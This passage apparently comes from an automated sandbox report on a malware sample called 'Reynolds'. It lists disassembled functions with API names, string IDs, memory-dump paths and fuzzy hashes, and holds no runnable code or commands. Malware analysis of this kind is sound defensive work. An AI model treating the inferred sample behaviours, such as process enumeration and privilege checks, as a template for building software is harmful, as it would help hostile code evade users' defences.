                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                      • API String ID: 0-572801152
                                                                                                      • Opcode ID: 5c1a4e62a646acb0bd1b5f4cc6a62ef7cbaeb95efe67bf12c35b99f614103513
                                                                                                      • Instruction ID: c24ee67ba1476bc8e886a272a4bc1a7378ae359b5b12dec57a2e9c9a2f498006
                                                                                                      • Opcode Fuzzy Hash: 5c1a4e62a646acb0bd1b5f4cc6a62ef7cbaeb95efe67bf12c35b99f614103513
                                                                                                      • Instruction Fuzzy Hash: F2E1C232A09B82E6EB11EF65E4402BDB7B0FB48798F824276DA4D47764DF38D546C710
                                                                                                      Function 00007FF7AA17368C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                      • String ID: SCRIPT
                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                      • Opcode ID: d5206061f2b3ac5e17ee2dd1b5fd8c27282f55e584baf03c5003c8e6f72eae5e
                                                                                                      • Instruction ID: 8aba8078db4cb20ac2752f42874cfc680bb0b370f9c23b6be683e3c900c3a01c
                                                                                                      • Opcode Fuzzy Hash: d5206061f2b3ac5e17ee2dd1b5fd8c27282f55e584baf03c5003c8e6f72eae5e
                                                                                                      • Instruction Fuzzy Hash: 6C219076709B41D2FB119B22E044A29A3B0FB89F88F455075DE8D43B24EF3CE846CB10
                                                                                                      Function 00007FF7AA0F5C44 Relevance: 9.2, APIs: 6, Instructions: 239COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 1568231622-0
                                                                                                      • Opcode ID: 79e0420c2984852e5f59fe1e813506d9fafb4aaa62b9c0ac84c7f4c88eda00f4
                                                                                                      • Instruction ID: 487788463eba4a13e87d08e5760102b680482e76ba7f2a7a0f03182dc037cc9f
                                                                                                      • Opcode Fuzzy Hash: 79e0420c2984852e5f59fe1e813506d9fafb4aaa62b9c0ac84c7f4c88eda00f4
                                                                                                      • Instruction Fuzzy Hash: 5FC16322E4E283E6F6B6AB10FA50175A7B0AF21784FC740B9C44D426B5EE6CB503C371
                                                                                                      Function 00007FF7AA127DFC Relevance: 9.2, APIs: 6, Instructions: 236COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 1405656091-0
                                                                                                      • Opcode ID: 3e809ee0917d980967337eb290ae9f657cbcc700f628c2feb101ff6f2151edd5
                                                                                                      • Instruction ID: 239e156642d8c0bd3344ea2822476958bf29305d8f19fd9b2aa8f1353e840ddb
                                                                                                      • Opcode Fuzzy Hash: 3e809ee0917d980967337eb290ae9f657cbcc700f628c2feb101ff6f2151edd5
                                                                                                      • Instruction Fuzzy Hash: 0C810AB2F06246DBFB59AF34E9017B9A2B1EB54784F858035DA0D4EB95EF3CE4068710
                                                                                                      Function 00007FF7AA12AD08 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1239891234-0
                                                                                                      • Opcode ID: c1a2dea820685187a1b1ee23aeb9defc365f229fa0d1b3730a4ebbe8088e0426
                                                                                                      • Instruction ID: 7065d97508e8754694e3288b5a9881a0bada89e85e3ea210a00e63c2ff9c4509
                                                                                                      • Opcode Fuzzy Hash: c1a2dea820685187a1b1ee23aeb9defc365f229fa0d1b3730a4ebbe8088e0426
                                                                                                      • Instruction Fuzzy Hash: DC318136609B81D5EB61DF25F8402AEB3B0FB88768F950139EA8D43B64DF38C546CB10
                                                                                                      Function 000002453CA24F10 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 264COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$CriticalLeaveSection_errno
                                                                                                      • String ID: 5
                                                                                                      • API String ID: 385122646-2226203566
                                                                                                      • Opcode ID: b2576e0c4156d4cee7c5235f3e08cab4a40bce9c42adbac06b8c0189b8e48b67
                                                                                                      • Instruction ID: 172c21a49f91c4ccfa1bfc88918b24f7c6db50b87b7ab7c9fe56c4938f84719d
                                                                                                      • Opcode Fuzzy Hash: b2576e0c4156d4cee7c5235f3e08cab4a40bce9c42adbac06b8c0189b8e48b67
                                                                                                      • Instruction Fuzzy Hash: 8EA1CEB3614A708BEB26DF25E44976ABBA1F780BC4F404155DE8787B86DB39D8C1CB40
                                                                                                      Function 00007FF7AA1276EC Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _handle_error
                                                                                                      • String ID: !$VUUU$fmod
                                                                                                      • API String ID: 1757819995-2579133210
                                                                                                      • Opcode ID: 06f58ab4aaca2128c338277b14f38b089639c2a9de57a5825e67876a1165aa04
                                                                                                      • Instruction ID: f90ef0f84bd080922e0493f8234e5a3c8d19cf1ef7025acd6222b4253c86b2c5
                                                                                                      • Opcode Fuzzy Hash: 06f58ab4aaca2128c338277b14f38b089639c2a9de57a5825e67876a1165aa04
                                                                                                      • Instruction Fuzzy Hash: 0AB1E861A19FC4C5E6A39B34A4113B6F2A9AFAA390F51C332D95E35A74DF2CD4878700
                                                                                                      Function 00007FF7AA132BB0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7AA132BF0
                                                                                                        • Part of subcall function 00007FF7AA12AF34: GetCurrentProcess.KERNEL32(00007FF7AA12B0A5), ref: 00007FF7AA12AF61
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                      • String ID: *$.$.
                                                                                                      • API String ID: 2518042432-2112782162
                                                                                                      • Opcode ID: 4bc727eecd12c05f0579dc3a47633661258e4e13a894efe955ef075ebd1ec7be
                                                                                                      • Instruction ID: a24c6458c1433ece61938416bde54e8f45eeea673e5b5cb9fa549467516d3c2b
                                                                                                      • Opcode Fuzzy Hash: 4bc727eecd12c05f0579dc3a47633661258e4e13a894efe955ef075ebd1ec7be
                                                                                                      • Instruction Fuzzy Hash: 9851ED62F16B55D0FB56EFA1E8402ADA2B4BB54BC8F968031CE2D17B94DE3CD0438320
                                                                                                      Function 00007FF7AA115A40 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7AA115AC3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                      • API String ID: 389471666-631824599
                                                                                                      • Opcode ID: 8c783dfea8ab590eafe6bbf95db9fdce1a8e48e032f2d75969754b32e98ee1d6
                                                                                                      • Instruction ID: a0dc7f4b4eb3090903b9eb0c34e3150067361f92e409b1e34fb6d05837137cfa
                                                                                                      • Opcode Fuzzy Hash: 8c783dfea8ab590eafe6bbf95db9fdce1a8e48e032f2d75969754b32e98ee1d6
                                                                                                      • Instruction Fuzzy Hash: BE116D3261AB42E7F746AB22E6503B9B3B0FB04359F854178C64D42A60EF3CE065C720
                                                                                                      Function 000002453CA2A660 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                      • API String ID: 1646373207-706389432
                                                                                                      • Opcode ID: 611390e442789d7f1a85b3be52b1f784bcb310a5b9c9223f5d4e059c00c8c7d4
                                                                                                      • Instruction ID: 9f82120f5818c48ab102df149c984da56e52e73212029acc61a7bbb1c6ac15c0
                                                                                                      • Opcode Fuzzy Hash: 611390e442789d7f1a85b3be52b1f784bcb310a5b9c9223f5d4e059c00c8c7d4
                                                                                                      • Instruction Fuzzy Hash: 6AE04226A02E2993EE069F81BD6D2542BA0B759B81F801195858A02B73EB3C95DA8300
                                                                                                      Function 00007FF7AA16C46C Relevance: 6.1, APIs: 4, Instructions: 101processCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                      • String ID:
                                                                                                      • API String ID: 1083639309-0
                                                                                                      • Opcode ID: b4230e9694d6db5a2454d9ccaa2f058036f57f1eebbf8966ac4aac68c055cdad
                                                                                                      • Instruction ID: a2904e292eb20577f9c779d114f59bf8480ab4d6e7d5a9f2252f8ca08378abf7
                                                                                                      • Opcode Fuzzy Hash: b4230e9694d6db5a2454d9ccaa2f058036f57f1eebbf8966ac4aac68c055cdad
                                                                                                      • Instruction Fuzzy Hash: A0418E22A1A682E1F712FB61E4841AEB370FB84784F864076EA4D53665EF7CD51BC710
                                                                                                      Function 00007FF7AA15DB9C Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                      • String ID:
                                                                                                      • API String ID: 3429775523-0
                                                                                                      • Opcode ID: 788e580e6745dde0bf41f1c5252257a7cd520450013a93ceb3609c7d43dd0201
                                                                                                      • Instruction ID: 93c921e9ec19bf635cd984b0c22fe1409d1a517416e780b8cbe30e57e61e50de
                                                                                                      • Opcode Fuzzy Hash: 788e580e6745dde0bf41f1c5252257a7cd520450013a93ceb3609c7d43dd0201
                                                                                                      • Instruction Fuzzy Hash: 95014073628781DFE7108F20E4553AA73B0F75476EF410929E64986A98CB7DC159CB80
                                                                                                      Function 00007FF7AA174124 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                      • String ID:
                                                                                                      • API String ID: 3479602957-0
                                                                                                      • Opcode ID: 9b3400b2d7958dcf7bb5d83233e54855c88d8e6a6dc818cc5e4bd19195bd4ddd
                                                                                                      • Instruction ID: 3e6f4e7ee9cfdcfdc167f0722ed33309632e9c045535113cff09c1e707a96d7e
                                                                                                      • Opcode Fuzzy Hash: 9b3400b2d7958dcf7bb5d83233e54855c88d8e6a6dc818cc5e4bd19195bd4ddd
                                                                                                      • Instruction Fuzzy Hash: 55F0A472B0D642D1E720AB25F84066AE271FF88794F565134EB5D42BB5DE3CD4058B10
                                                                                                      Function 00007FF7AA1341A8 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 54951025-0
                                                                                                      • Opcode ID: 240d552e835f2b25362e23fc86050fbc2e15662c94a0908d5121eb02f9075e07
                                                                                                      • Instruction ID: 60aa6b9399b3a4533e4f31941bfa576e3a2210bc3092d00b6c33efb414482ee1
                                                                                                      • Opcode Fuzzy Hash: 240d552e835f2b25362e23fc86050fbc2e15662c94a0908d5121eb02f9075e07
                                                                                                      • Instruction Fuzzy Hash: 9AB09221E0BB46E2FA0A3B11BC8621462B87F48714FDA41B9C00D40330DF2C21AA9720
                                                                                                      Function 00007FF7AA12FBB0 Relevance: .0, Instructions: 32COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 487ac93962f4c08a726fa4f1cbcf22742163b5770d24f742e327d9c4be1ea4b1
                                                                                                      • Instruction ID: 4a53525fc8b06426f32589d2a1838febad3581f006234e2c9674238386616aac
                                                                                                      • Opcode Fuzzy Hash: 487ac93962f4c08a726fa4f1cbcf22742163b5770d24f742e327d9c4be1ea4b1
                                                                                                      • Instruction Fuzzy Hash: 7FF0447162A255DAFBA59F2CF842A2977A0E7483C0F908079DA8983B54DA3C91718F54
                                                                                                      Function 00007FF7AA115850 Relevance: .0, Instructions: 2COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8f6d893820d0fab81262624eeca4fcab017bbf27f8cb14a3bd45f903649d3583
                                                                                                      • Instruction ID: 4afbc207b78b3f023875a9dcae676b14cf65036feab0b95cdacbf454130c215c
                                                                                                      • Opcode Fuzzy Hash: 8f6d893820d0fab81262624eeca4fcab017bbf27f8cb14a3bd45f903649d3583
                                                                                                      • Instruction Fuzzy Hash: 82A001A190E81AF4F646AB02F850020A270EB50328BCA04B9E00D410B09E3CA4528324
                                                                                                      Function 00007FF7AA19F0C0 Relevance: 49.7, APIs: 33, Instructions: 231windowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
